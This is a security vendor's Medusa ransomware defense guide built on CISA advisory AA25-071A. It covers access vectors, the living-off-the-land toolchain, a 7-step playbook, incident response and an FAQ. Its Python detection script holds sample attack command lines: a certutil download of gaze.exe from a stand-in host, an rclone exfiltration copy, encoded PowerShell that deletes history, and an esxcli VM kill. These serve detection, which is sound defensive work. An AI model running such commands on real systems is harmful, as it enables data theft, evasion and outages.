Medusa Ransomware Defense Guide (2026 Update)
Posted: May 16, 2026 to Cybersecurity.
Active threat brief
Medusa is a Ransomware-as-a-Service operator active since June 2021. The FBI, CISA, and MS-ISAC issued joint advisory AA25-071A on March 12, 2025, after Medusa affiliates impacted more than 300 critical infrastructure victims through February 2025. The group escalated double-extortion tactics in 2024-2025, with a public leak site, a 48-hour ransom countdown, and a $10,000 cryptocurrency fee to extend that timer by a single day.
If your perimeter is exposed or you suspect active intrusion, call Petronella Technology Group's 24/7 incident response line at (919) 348-4912. The 7-step defense playbook below is built for SMB and mid-market teams who need named-strain intelligence, not generic ransomware advice.
This guide translates the CISA AA25-071A advisory into actions an SMB CISO, IT director, or on-call responder can take this week. We focus on Medusa specifically: the affiliates, the initial access vectors, the living-off-the-land toolchain, the encryption phase, and the decision tree if you are already inside the incident. Petronella Technology Group has run incident response, digital forensics, and managed XDR engagements out of Raleigh since 2002, and Craig Petronella (DFE #604180, CMMC-RP) leads the responder bench. We are CMMC-RPO #1449.
Who is Medusa, and why should an SMB care?
Medusa is a Ransomware-as-a-Service operation. A small core team maintains the encryptor, the negotiation chat, and the Medusa Blog leak site. Affiliates carry out the intrusions and split the ransom proceeds. The model lowers the bar for entry, which is why Medusa victim counts climbed sharply through 2024 and into 2025.
The victim profile is not Fortune 100. CISA AA25-071A names healthcare, education, manufacturing, legal, insurance, and technology as primary sectors. Local school districts, regional hospitals, mid-market manufacturers, and law firms have all surfaced on the Medusa Blog. If your organization runs internet-facing remote access, sits in one of those sectors, and lags patches by more than a few weeks, you are inside Medusa's target band.
Double extortion means two coercion levers running at once. Files on disk are encrypted with the .medusa extension, and a copy of sensitive data is exfiltrated to attacker infrastructure before the encryptor fires. Victims are given a 48-hour window in the ransom note to begin negotiation through a Tor-based chat or the Tox messenger. Refuse, and stolen data appears on the Medusa Blog. Unit 42 documented Medusa moving toward more aggressive public posting starting in early 2023.
The $10,000-per-day timer extension is unusual. It is designed to apply pressure on internal stakeholders who think they have a week to decide. They do not.
Initial access: how Medusa gets in
According to AA25-071A, Medusa affiliates rely on two consistent entry paths.
Phishing for credentials. Initial access brokers run phishing campaigns to steal valid credentials. Those credentials are then sold or used directly by Medusa affiliates to log in to email, VPN, or RDP. Because the login is "valid," many SMB defenses do not raise an alert until lateral movement begins.
Exploitation of known, unpatched CVEs. AA25-071A and industry analysis identify two named vulnerabilities Medusa actors have leveraged:
- CVE-2024-1709, the ConnectWise ScreenConnect authentication bypass (CVSS 10.0). Any SMB running an unpatched ScreenConnect server, including managed-services providers, has been a target.
- CVE-2023-48788, the Fortinet FortiClient EMS SQL injection (CVSS 9.8). Internet-exposed FortiClient EMS instances that missed the March 2024 patch window are at sustained risk.
Beyond those two named CVEs, the broader directive from AA25-071A is the only durable advice: patch the CVEs called out in CISA advisories the same week they are published, especially anything on the edge of your network. Affiliates do not invent zero-days. They reuse the public CVE feed against organizations that have not patched.
Living off the land: what Medusa does once inside
Medusa actors operate quietly using legitimate administrative tools, a pattern security teams call "living off the land." The CISA advisory documents the following toolchain:
- Remote access: AnyDesk for persistent access, Remote Desktop Protocol for lateral pivoting, and abuse of ConnectWise ScreenConnect where it is already deployed.
- Reconnaissance: Advanced IP Scanner and SoftPerfect Network Scanner to map internal subnets and identify file shares, domain controllers, and ESXi hosts.
- Credential theft: Mimikatz to dump credentials from LSASS memory on compromised hosts.
- Lateral distribution: PsExec for command execution across hosts, plus PDQ Deploy and BigFix where Medusa affiliates can hijack existing patch-management infrastructure.
- Defense evasion: Disabling endpoint security, deleting PowerShell command history, executing base64-encoded commands, and obfuscating strings by slicing them into variables.
- Exfiltration: rclone to push stolen files to attacker-controlled cloud storage before encryption fires.
- Encryptor delivery: certutil for file transfer; a binary commonly observed as gaze.exe drops the encryptor.
None of these tools are malware by themselves. PsExec, AnyDesk, rclone, and PDQ Deploy are all in legitimate use across thousands of IT shops. That is the point. A signature-based antivirus will not catch the Medusa kill chain. Detection requires behavioral analytics, an EDR with managed review, and someone on call who can correlate "rclone running on a workstation at 2:14 a.m." with "this is wrong." Our managed XDR suite and 24/7 AI-and-human-hybrid SOC are scoped specifically for this detection problem.
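As an added defender-side example (not from the advisory and not Petronella's tooling), here is a small Python triage pass over constructed process-creation events that flags the AA25-071A toolchain listed above, and the same host indicators the FAQ lists later: rclone, certutil used as a downloader, the gaze.exe dropper name, base64-encoded PowerShell (decoded so history deletion hidden inside it is still caught), and esxcli force-killing VMs, with off-hours hits escalated. Hosts, paths, timestamps and the world-id are invented, and the rule set, severities and the 22:00 to 06:00 window are my assumptions, not the advisory's.

```python
import base64
import re
from datetime import datetime
# Constructed process-creation events (Sysmon Event ID 1 style, cut down to the
# fields the rules need). Hosts, paths, timestamps and the world-id are invented.
HISTORY = r"$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
ENC = base64.b64encode(f"Remove-Item {HISTORY}".encode("utf-16-le")).decode()
EVENTS = [
    {"ts": "2026-05-11T14:02:10", "host": "WS-017", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/g gaze.exe"},
    {"ts": "2026-05-12T02:14:33", "host": "WS-017", "image": r"C:\Users\jdoe\AppData\Local\Temp\rclone.exe",
     "cmdline": r"rclone.exe copy D:\Shares\Finance remote:bucket --transfers 16"},
    {"ts": "2026-05-12T02:20:05", "host": "DC01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENC}"},
    {"ts": "2026-05-12T02:31:47", "host": "esxi-01", "image": "/bin/esxcli",
     "cmdline": "esxcli vm process kill --type=force --world-id=2101"},
    {"ts": "2026-05-12T09:00:00", "host": "WS-022", "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": r"EXCEL.EXE C:\Users\asmith\Q2.xlsx"},
]
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
image_name = lambda e: re.split(r"[\\/]", e["image"])[-1].lower()  # works for Windows and ESXi paths

def decode_encoded_command(cmdline):
    """Decode a PowerShell -EncodedCommand payload (base64 of UTF-16LE text) or return None."""
    m = ENC_RE.search(cmdline)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

# (rule name, base severity, predicate) - tuned to the toolchain named in AA25-071A
RULES = [
    ("rclone execution (exfiltration staging)", "high", lambda e: image_name(e) == "rclone.exe"),
    ("certutil used as downloader", "high",
     lambda e: image_name(e) == "certutil.exe" and "-urlcache" in e["cmdline"].lower()),
    ("gaze.exe referenced (encryptor dropper name)", "critical", lambda e: "gaze.exe" in e["cmdline"].lower()),
    ("encoded PowerShell command", "medium",
     lambda e: image_name(e) == "powershell.exe" and decode_encoded_command(e["cmdline"]) is not None),
    ("PowerShell history deletion", "high",
     lambda e: "consolehost_history" in (decode_encoded_command(e["cmdline"]) or e["cmdline"]).lower()),
    ("esxcli force-kill of running VM", "critical",
     lambda e: image_name(e) == "esxcli" and "vm process kill" in e["cmdline"].lower()),
]

def triage(events):
    """Run every rule over every event; hits between 22:00 and 06:00 escalate one level."""
    findings = []
    for e in events:
        off_hours = not 6 <= datetime.fromisoformat(e["ts"]).hour < 22
        for name, sev, pred in RULES:
            if pred(e):
                if off_hours:  # rclone at 2:14 a.m. is worse than rclone at noon
                    sev = {"medium": "high", "high": "critical"}.get(sev, sev)
                findings.append({"host": e["host"], "ts": e["ts"], "rule": name, "severity": sev})
    return findings
```

Feeding real Sysmon or EDR process events into triage() only needs the four fields shown; the benign Excel launch is there to confirm the rules stay quiet on ordinary activity.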
Encryption phase: ESXi and Windows variants
Medusa maintains both a Windows encryptor and an ESXi-targeted variant. The Windows variant uses AES-256 encryption, appends the .medusa extension, and drops a ransom note titled !READ_ME_MEDUSA!!.txt. The note routes the victim to a Tor browser-based live chat or to a Tox messenger ID, with a 48-hour clock.
The ESXi variant is the one that destroys SMBs. Affiliates targeting a virtualized environment use stolen credentials to log in to vCenter or the ESXi host directly, then issue esxcli commands to terminate running virtual machines so the .vmdk files can be encrypted while at rest. A single successful ESXi run can take an entire data center offline in under an hour. If your VMware management interfaces are reachable from the user LAN, that is the single highest-risk gap in your environment.
Some intrusions complete the encryption phase in under 24 hours from initial access, which is why phishing-driven incidents often surface as "we got an email yesterday and now everything is encrypted." There is rarely a multi-week dwell time with Medusa affiliates the way there is with some other ransomware crews.
The 7-step Medusa defense playbook
This is the prioritized list for an SMB CISO, IT director, or MSP working a Medusa risk reduction sprint.
1. Patch CVE-2024-1709 and CVE-2023-48788 today, then institutionalize CISA-advisory patching
If you are running ConnectWise ScreenConnect on-prem or FortiClient EMS, confirm patch status this hour, not this week. After that, build a process that triages every CISA advisory within 7 days. Internet-facing systems get same-week patches; internal systems get 30-day cycles with an exception process. Our penetration testing service includes external attack surface scoping that catches exposed management interfaces before Medusa scanners do.
2. Phishing-resistant MFA on every remote access path
Medusa affiliates buy valid credentials from initial access brokers. SMS-based and push-based MFA are repeatedly bypassed by MFA-fatigue campaigns and SIM-swap attacks. Move VPN, RDP gateway, VDI, Microsoft 365, and any SSO to phishing-resistant factors: FIDO2 security keys, Windows Hello for Business, or platform passkeys. Enforce MFA on every account, including service accounts wherever supported.
3. Immutable, offline backups using the 3-2-1-1-0 rule
Three copies, two media types, one offsite, one offline or immutable, zero errors on test restores. The "one immutable" copy is the rule that defeats Medusa. Cloud object lock, tape, or air-gapped media protects the recovery path even if the encryptor reaches the backup server. Test the restore quarterly; an untested backup is a guess. Our backup and disaster recovery service is built around this rule.
4. EDR with managed SOC review, not just installed
Behavioral EDR catches Mimikatz, PsExec lateral movement, rclone exfiltration, and esxcli abuse. But only if someone reviews alerts at 2:14 a.m. SMBs that install EDR without a 24/7 review function frequently miss the early kill chain stages because alerts fire into an empty inbox. A managed SOC, whether in-house or outsourced, is the difference between a noisy log and a contained incident. See managed XDR suite.
5. Email security tuned for credential-harvest phishing
Layer DMARC enforcement, attachment sandboxing, URL rewriting, and user reporting on top of native Microsoft 365 or Google Workspace controls. Pair the technical controls with phishing simulation that rotates pretexts every quarter. The goal is not zero clicks; it is fast user reporting and a tight feedback loop from inbox to SOC.
6. Network segmentation around ESXi management and backups
The ESXi management network and the backup repository should not be reachable from user workstations. Use VLANs, host firewalls, and jump hosts. Require a separate, MFA-protected, just-in-time admin path. This single control would have blunted the encryption-phase blast radius in many published Medusa cases.
7. Tested incident response plan with named roles
A plan that lives in a binder and has never been rehearsed will fail at 3 a.m. Run a tabletop exercise twice a year that walks through a Medusa scenario: phishing email lands Monday, lateral movement Wednesday, ESXi encryption Friday. Identify who calls legal counsel, who calls the cyber-insurance carrier, who decides whether to engage law enforcement, and who has authority to disconnect the WAN. Petronella's incident response services include retainer-based tabletop facilitation.
If you suspect active intrusion right now
Call our 24/7 line: (919) 348-4912. Do this before you reboot anything.
The single most damaging move in the first hour of a suspected Medusa intrusion is rebooting a workstation to "clear it up." Reboots destroy volatile evidence in memory: credentials in LSASS, in-flight network connections, attacker-controlled process trees, and unencrypted shadow copies. Preserve the machine state. Disconnect from the network if you must, but do not power down.
The decision tree we work through with a client in the first 60 minutes:
- Scope: How many hosts show indicators? Is the domain controller compromised? Is ESXi management reachable from the affected segment?
- Contain: Disable inbound RDP and VPN at the firewall. Disable suspect user accounts. Block known Medusa Tor exit nodes if they appear in egress logs.
- Preserve: Take memory captures of impacted hosts. Pull network packet captures at the egress. Image at least one affected endpoint before remediation begins.
- Notify: Engage cyber-insurance counsel before talking to anyone external. Counsel directs the privilege relationship with the forensic firm.
- Assess: Determine whether exfiltration completed. The rclone process logs and the egress traffic volume tell that story.
Our digital forensics team supports the evidence preservation side of this in coordination with counsel and the insurer.
Recovery playbook: do not pay by default
The default answer to "should we pay?" is no. There are three reasons.
First, payment funds the next intrusion. CISA and the FBI consistently recommend against paying ransom because it sustains the RaaS economy.
Second, payment does not guarantee decryption. There are documented Medusa cases where victims paid, received a faulty decryptor, and still had to rebuild from backups. There are also reported instances of double-dipping, where affiliates demanded a second payment after the first.
Third, payment does not stop the leak. Exfiltrated data exists on attacker infrastructure indefinitely. Paying buys a promise to delete it, not proof of deletion.
The default recovery flow:
- Document the incident contemporaneously for the cyber-insurance carrier. Insurers will ask for timestamps, screenshots, log excerpts, and the chain of decisions. Memory fades; the record needs to be created during the event.
- Preserve evidence for law enforcement. Coordinate with the FBI field office and report through IC3 or your CISA regional advisor.
- Restore from the immutable backup tier after confirming the backups themselves are clean.
- Rotate every credential. Every. Domain admin, service accounts, application secrets, API keys, VPN PSKs, cloud IAM keys. Assume Mimikatz captured the lot.
- Rebuild the perimeter. Replace any internet-facing system that was the initial access point; do not patch in place.
- Conduct a post-incident review within 30 days. Update the IR plan with what the tabletop did not anticipate.
How Petronella Technology Group helps
Petronella Technology Group has been doing cybersecurity, incident response, and digital forensics out of Raleigh, North Carolina since 2002. Craig Petronella holds a Digital Forensics Examiner credential (DFE #604180), the CMMC Registered Practitioner designation, and MIT-Certified credentials in AI and Blockchain. The team is collectively CMMC-RP, and we are a CMMC Registered Provider Organization, RPO #1449. BBB A+ since 2003.
Our service stack against Medusa-class threats:
- Managed XDR with 24/7 AI-and-human hybrid SOC review.
- Incident response retainer with named-responder SLAs and tabletop facilitation.
- Immutable backup and disaster recovery that implements 3-2-1-1-0 by default.
- External attack surface and penetration testing to find what Medusa scanners would find.
- Digital forensics for evidence preservation, insurance claim support, and post-incident review.
- Full cybersecurity program coverage including governance, awareness, and CMMC, HIPAA, and NIST 800-171 alignment.
Call (919) 348-4912 for a 24/7 incident response engagement, or for a proactive assessment of your exposure to the CVEs and TTPs documented in CISA AA25-071A.
Frequently asked questions
What is Medusa ransomware?
Medusa is a Ransomware-as-a-Service operation that has been active since June 2021. A core development team maintains the encryptor and the Medusa Blog leak site; independent affiliates carry out the intrusions and share ransom proceeds. CISA, the FBI, and MS-ISAC published joint advisory AA25-071A on March 12, 2025, after Medusa affiliates impacted more than 300 critical infrastructure victims through February 2025.
How does Medusa breach a network?
Two consistent entry paths. First, phishing campaigns run by initial access brokers harvest valid credentials, which are then used to log in to VPN, RDP, or email. Second, exploitation of known unpatched CVEs, with CVE-2024-1709 in ConnectWise ScreenConnect and CVE-2023-48788 in Fortinet FortiClient EMS specifically named in the public reporting. Once inside, affiliates use AnyDesk, PsExec, Mimikatz, and rclone to move laterally and exfiltrate data before encryption.
Should I pay the Medusa ransom?
The default answer is no. The FBI and CISA both recommend against payment. Payment funds the next intrusion, does not guarantee a working decryptor, and does not stop exfiltrated data from appearing on the Medusa Blog. Payment also does not eliminate the legal, regulatory, and notification obligations the breach triggered. Decisions about payment should run through cyber-insurance counsel, not be made by an IT director alone under pressure.
What is the CISA advisory on Medusa?
CISA AA25-071A, titled "#StopRansomware: Medusa Ransomware," was published on March 12, 2025 by CISA, the FBI, and MS-ISAC. It documents Medusa TTPs and indicators of compromise observed through February 2025, lists tools the affiliates use, names key CVEs being exploited, and provides recommended mitigations. The advisory includes a STIX-format IOC bundle for ingestion into SIEM and EDR platforms.
How can I tell if I have been infected?
Indicators include files with the .medusa extension, a ransom note named !READ_ME_MEDUSA!!.txt, unexpected AnyDesk or ConnectWise ScreenConnect installations, rclone or certutil processes running on workstations or servers, PowerShell command history that has been deleted, base64-encoded commands in event logs, and unexpected reboots of ESXi virtual machines. Earlier indicators include phishing emails delivered to staff, unusual successful logins from unfamiliar geographies, and Mimikatz signatures on domain controllers. An EDR with managed review catches most of the early indicators; raw event log review catches the rest.
How quickly can Medusa encrypt a network?
Faster than most SMBs expect. Some published intrusions move from initial access to full encryption in under 24 hours. The ESXi variant is particularly fast because a single affiliate with stolen vCenter credentials can issue esxcli kill commands to shut down every running VM and then encrypt the .vmdk files at rest in minutes. This is why detection at the initial-access stage, not the encryption stage, is the only realistic defense posture.
What sectors does Medusa target?
Healthcare, education, manufacturing, legal, insurance, and technology are explicitly named in CISA AA25-071A. The common thread is mid-market organizations with internet-facing remote access, regulatory-grade data worth extorting, and patch cycles that lag CISA advisories by more than 7 days. Petronella Technology Group works with clients across all six of those sectors and aligns defensive programs to HIPAA, CMMC, ISO 27001, and NIST 800-171 where applicable.
Sources cited: CISA AA25-071A "#StopRansomware: Medusa Ransomware" (March 12, 2025, FBI, CISA, MS-ISAC); Unit 42 by Palo Alto Networks reporting on the Medusa Blog leak site escalation (2023-2025); Picus Security analysis of AA25-071A; Industrial Defender summary of the joint advisory.